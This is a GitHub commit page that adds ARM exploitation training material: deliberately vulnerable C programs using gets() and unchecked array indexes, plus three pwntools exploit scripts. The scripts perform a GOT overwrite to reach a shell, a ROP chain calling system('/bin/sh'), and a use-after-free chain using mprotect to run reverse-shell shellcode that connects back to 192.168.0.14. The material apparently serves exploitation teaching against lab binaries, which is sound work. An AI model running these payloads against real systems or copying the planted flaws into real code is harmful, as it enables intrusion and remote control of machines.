-
Notifications
You must be signed in to change notification settings - Fork 18
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
c4f28df
commit aa14be8
Showing
8 changed files
with
658 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
#!/usr/bin/env python2 | ||
|
||
from pwn import * | ||
|
||
ip = "192.168.0.13" | ||
port = 22 | ||
user = "pi" | ||
pwd = "toSet" | ||
|
||
libc = ELF('libc-2.24.so') | ||
gadget_offset = 0xed748 | ||
|
||
shell = ssh(user, ip, password=pwd, port=port) | ||
|
||
sh = shell.run('/home/pi/arm/episode3/got_overw') | ||
|
||
# fill the array | ||
sh.recvuntil('array:\n') | ||
sh.sendline('1852400175') # "nib/" | ||
sh.sendline('6845231') # "hs/" | ||
for i in range(0,10): | ||
sh.sendline(str(i)) | ||
|
||
sh.recvuntil('read: \n') | ||
|
||
# Leak the libc address | ||
sh.sendline('-9') # offset to the libc in the GOT section | ||
ret = sh.recvline().split() | ||
libc_main = int(ret[6]) | ||
# libc_base = libc_main - libc_base_offset | ||
libc_base = libc_main - libc.symbols['__libc_start_main'] | ||
log.info('libcbase: %#x' % libc_base) | ||
# address of the system function | ||
system_addr = libc_base + libc.symbols['system'] | ||
log.info('system address: %#x' % system_addr) | ||
|
||
sh.recvuntil('[y/n]\n') | ||
# do not read other values | ||
sh.sendline('n') | ||
|
||
sh.recvuntil('modify?\n') | ||
# send the system function address | ||
sh.sendline(str(system_addr)) | ||
sh.recvuntil('modify\n') | ||
sh.sendline('-10') # offset of the put in the GOT section | ||
sh.recvuntil('value\n') | ||
# gadget address | ||
gadget_address = libc_base + gadget_offset | ||
log.info('gadget address: %#x' % gadget_address) | ||
# send the gadget address | ||
sh.sendline(str(gadget_address)) | ||
|
||
sh.interactive() | ||
|
||
shell.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
#!/usr/bin/env python2 | ||
|
||
from pwn import * | ||
|
||
ip = "192.168.0.13" | ||
port = 22 | ||
user = "pi" | ||
pwd = "toSet" | ||
|
||
libc = ELF('libc-2.24.so') | ||
|
||
shell = ssh(user, ip, password=pwd, port=port) | ||
|
||
sh = shell.run('/home/pi/arm/episode3/stack_overflow') | ||
|
||
payload = "A"*64 | ||
payload += p32(0x1) # r0 - standard output | ||
payload += p32(0x1046C) # rop gadget pop {r0, r1, r2, lr}; bx lr | ||
payload += p32(0x2100c) # r1 - address of read | ||
payload += p32(0x4) # r2 - number of bytes to write | ||
payload += p32(0x104C8) # lr - address of write | ||
payload += p32(0x00) # not used | ||
payload += p32(0x10488) # jump to the read - 0x104d4 <main+36> pop {r11, pc} | ||
sh.sendline(payload) | ||
|
||
# get the read address | ||
read_address = u32(sh.recv(4)) | ||
log.info('address of the read: %#x' % read_address) | ||
# get the libc_base address | ||
libc_base_address = read_address - libc.symbols['read'] | ||
# get the system address | ||
system_address = libc_base_address + libc.symbols['system'] | ||
log.info('address of the system: %#x' % system_address) | ||
shell_address = libc_base_address + next(libc.search("/bin/sh")) | ||
|
||
payload = "A"*64 | ||
payload += p32(shell_address) # r0 - /bin/sh address | ||
payload += p32(0x1046C) # rop gadget pop {r0, r1, r2, lr}; bx lr | ||
payload += p32(0x00) # r1 - not used | ||
payload += p32(0x00) # r2 - not used | ||
payload += p32(system_address) # lr - address of the system | ||
sh.sendline(payload) | ||
|
||
sh.interactive() | ||
|
||
shell.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,132 @@ | ||
#!/usr/bin/env python2 | ||
from pwn import * | ||
import pwnlib.asm as asm | ||
import pwnlib.elf as elf | ||
|
||
ip = "192.168.0.13" | ||
port = 4444 | ||
|
||
PAGE_SIZE = 0x1000 | ||
|
||
def find_arm_gadget(e, gadget): | ||
gadget_bytes = asm.asm(gadget, arch='arm') | ||
gadget_address = None | ||
for address in e.search(gadget_bytes): | ||
if address % 4 == 0: | ||
gadget_address = address | ||
if gadget_bytes == e.read(gadget_address, len(gadget_bytes)): | ||
log.info(asm.disasm(gadget_bytes, vma=gadget_address, arch='arm')) | ||
break | ||
return gadget_address | ||
|
||
def find_thumb_gadget(e, gadget): | ||
gadget_bytes = asm.asm(gadget, arch='thumb') | ||
gadget_address = None | ||
for address in e.search(gadget_bytes): | ||
if address % 2 == 0: | ||
gadget_address = address + 1 | ||
if gadget_bytes == e.read(gadget_address - 1, len(gadget_bytes)): | ||
log.info(asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb')) | ||
break | ||
return gadget_address | ||
|
||
def find_gadget(e, gadget): | ||
gadget_address = find_thumb_gadget(e, gadget) | ||
if gadget_address is not None: | ||
return gadget_address | ||
return find_arm_gadget(e, gadget) | ||
|
||
# libc file | ||
libc = ELF('libc-2.24.so') | ||
|
||
s = remote(ip, port) | ||
|
||
log.info('-----------------------------------------------') | ||
|
||
#####LEAK##### | ||
offset = 0x32df0c | ||
s.sendline('9') | ||
leak_value = s.recvuntil("area") | ||
# arbitrary read | ||
s.sendline('0x%08x.0x%08x.0x%08x') | ||
leak_values = s.recvuntil("done!") | ||
wel_msg = int(leak_values[76:84], 16) | ||
roulette_add = int(leak_values[109:114], 16) | ||
stack_address = int(leak_values[13:23], 16) | ||
|
||
log.info("The wel_msg address is: 0x%x", wel_msg) | ||
log.info("The roulette address is: 0x%x", roulette_add) | ||
log.info("The leak_address: 0x%x", stack_address) | ||
|
||
# libc base address | ||
libc_base = stack_address - offset | ||
log.info("Libc base address: 0x%x", libc_base) | ||
|
||
# mprotect address | ||
mprotect_address = libc_base + libc.symbols['mprotect'] | ||
log.info('mprotect address 0x%x' % mprotect_address) | ||
|
||
# gadget address | ||
libc.address = libc_base | ||
pop_r0_r1_r2_r3_r4_pc = find_gadget(libc, 'pop {r0, r1, r2, r3, r4, pc}') | ||
|
||
# insert note "AAAA" | ||
s.sendline('1') | ||
s.sendline('A'*4) | ||
# insert address of wel_msg as note | ||
s.sendline('1') | ||
s.sendline(p32(wel_msg)) | ||
# insert note "BBBB" | ||
s.sendline('1') | ||
s.sendline('B'*4) | ||
|
||
# reverse shell shellcode + "\x33" | ||
shellcode = "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0e\x1b\x01\x00\x00\x33" | ||
|
||
# len of the new stack | ||
stack_len = 40 | ||
stack = "" | ||
# set LR | ||
stack += p32(wel_msg + 36) #LR = address of the shellcode | ||
# gadget 2 - 76d6bb08: pop {r0, r1, r2, r3, r4, pc} | ||
stack += p32(pop_r0_r1_r2_r3_r4_pc) # thumb address | ||
# r0 = (wel_msg / PAGE_SIZE ) * PAGE_SIZE | ||
stack += p32((wel_msg / PAGE_SIZE) * PAGE_SIZE) | ||
# r1 = 0x100 | ||
stack += p32(0x100) | ||
# r2 = 0x7 | ||
stack += p32(0x07) #RWX | ||
# r3 = 0x00 | ||
stack += p32(0x00) | ||
# r4 = 0x00 | ||
stack += p32(0x00) | ||
# r5 = mprotect addres | ||
stack += p32(mprotect_address) | ||
stack += "ZZZZ" | ||
# change the wel_msg value | ||
s.sendline('0') | ||
s.sendline(stack + shellcode) | ||
ret = s.recvuntil("message") | ||
sleep(1) | ||
|
||
# objdump -d uaf | grep stack_pivot | ||
# 000111cc <_Z11stack_pivotv>: | ||
roulette_value = 0x111cc # address of the stack_pivot function | ||
# delete edit_obj | ||
s.sendline('4') | ||
s.sendline(str(roulette_value)) | ||
ret = s.recvuntil("message") | ||
sleep(1) | ||
|
||
# allocare the hole - set_address() | ||
s.sendline('5') | ||
s.sendline(str(roulette_add)) | ||
ret = s.recvuntil("message") | ||
sleep(1) | ||
|
||
# take control - show all note | ||
s.sendline('2') | ||
ret = s.recvuntil("message") | ||
sleep(1) | ||
|
||
s.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,86 @@ | ||
#include <stdio.h> | ||
#include <math.h> | ||
|
||
#define MAX 12 | ||
#define PI 3.14159265 | ||
|
||
int main() | ||
{ | ||
static int arr[MAX]; | ||
char ch; | ||
int num, ret; | ||
int flag=1; | ||
unsigned int i, in_num, out_num, cos_param, write_index; | ||
|
||
printf("Please fill the array:\n"); | ||
|
||
for(i=0;i<MAX;i++){ | ||
if(scanf("%d", &in_num)==1){ | ||
arr[i]=in_num; | ||
} | ||
else{ | ||
printf("Please enter a number\n"); | ||
return 0; | ||
} | ||
} | ||
|
||
while(flag){ | ||
printf("Select the index of the element that you want to read: \n"); | ||
|
||
if(scanf("%d", &num)!=1){ | ||
printf("Please enter a number\n"); | ||
return 0; | ||
} | ||
|
||
printf("At position %d the value is %d\n", num, arr[num]); | ||
|
||
printf("Do you want read another number? [y/n]\n"); | ||
|
||
scanf(" %c", &ch); | ||
|
||
if(ch!='y'){ | ||
flag=0; | ||
} | ||
} | ||
|
||
printf("How many value do you want to modify?\n"); | ||
|
||
if(scanf("%d", &cos_param)!=1){ | ||
printf("Please enter a number:\n"); | ||
return 0; | ||
} | ||
//param 180 | ||
ret = cos(cos_param * PI /180.0); | ||
|
||
if (ret<0){ | ||
write_index = MAX; | ||
} | ||
else | ||
{ | ||
write_index = 1; | ||
} | ||
|
||
while(write_index){ | ||
if(flag!=0){ | ||
printf("Do you want to edit some value in the array? [y/n]\n"); | ||
scanf(" %c", &ch); | ||
} | ||
|
||
if(ch=='y' || flag==0){ | ||
printf("Select the index of the element that you want to modify\n"); | ||
scanf("%d", &num); | ||
|
||
printf("Enter the new value\n"); | ||
scanf("%d", &out_num); | ||
|
||
arr[num]=out_num; | ||
write_index--; | ||
flag=1; | ||
} | ||
else{ | ||
break; | ||
} | ||
} | ||
printf("Good done!\n"); | ||
return 0; | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,47 @@ | ||
#include <stdio.h> | ||
#include <string.h> | ||
|
||
char msgSecret[] = "This is the secret message"; | ||
char msgDefault[] = "This is the default message"; | ||
|
||
typedef struct _msg_struct | ||
{ | ||
char message[32]; | ||
int (*print_msg)(); | ||
}msg_struct; | ||
|
||
int print_secr() | ||
{ | ||
printf("Congrats! %s\n", msgSecret); | ||
return 0; | ||
} | ||
|
||
int print_default() | ||
{ | ||
printf("Hello! %s\n", msgDefault); | ||
return 0; | ||
} | ||
|
||
int main(int argc, char **argv) | ||
{ | ||
char message[80]; | ||
msg_struct p; | ||
|
||
printf("Please enter a message: \n"); | ||
|
||
gets(message); | ||
|
||
if(*message) | ||
{ | ||
p.print_msg=print_default; | ||
strcpy(p.message, message); | ||
p.print_msg(); | ||
} | ||
else | ||
{ | ||
printf("Insert the message!\n"); | ||
} | ||
|
||
return 0; | ||
} | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
#include <stdio.h> | ||
|
||
char pwdSecret[] = "stack123!"; | ||
|
||
void print_secr() | ||
{ | ||
printf("Password is %s\n", pwdSecret); | ||
} | ||
|
||
int main(int argc, char **argv) | ||
{ | ||
int check=0; | ||
char buffer[32]; | ||
|
||
gets(buffer); | ||
|
||
if(check == 0x74696445) { | ||
print_secr(); | ||
} | ||
else | ||
{ | ||
printf("No password to show\n"); | ||
} | ||
} |
Oops, something went wrong.